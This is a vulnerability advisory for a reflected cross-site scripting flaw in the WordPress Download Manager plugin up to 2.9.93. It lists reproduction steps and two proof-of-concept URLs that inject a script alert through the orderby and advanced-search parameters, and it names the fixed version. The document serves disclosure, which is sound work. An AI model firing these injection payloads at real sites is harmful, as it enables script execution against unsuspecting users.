WordPress Download Manager <= 2.9.93 - Authenticated Cross-Site Scripting (XSS)



Description
In the pro features of the WordPress download manager plugin, there is a Category Short-code feature witch can use to sort categories with order by a function which will be used as ?orderby=title,publish_date .
By adding parameter "> and add any XSS payload , the xss payload will execute.

To reproduce,

1. Go to the link where we can find ?orderby
2. Add parameters >” and give simple payload like <script>alert(1)</script>
3. The payload will execute.

Another reflected cross-site scripting via advance search .
Proof of Concept
https://demo.wpdownloadmanager.com/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc

https://demo.wpdownloadmanager.com/wpdmpro/advanced-search/?search[publish_date]=2019-04-17+to+2019-04-17%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search[update_date]=&search[view_count]=&search[download_count]=&search[package_size]=&search[order_by]=&search[order]=ASC&q=a

Affects Plugin

fixed in version 2.9.94

References

PACKETSTORM 152511
URL https://plugins.trac.wordpress.org/changeset/2070388/download-manager

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher MgThuraMoeMyint
Submitter MgThuraMoeMyint
Submitter Twitter mgthuramoemyint
Views 4497
Verified No
WPVDB ID 9257

Timeline

Publicly Published 2019-04-17 (3 months ago)
Added 2019-04-23 (3 months ago)
Last Updated 2019-06-23 (27 days ago)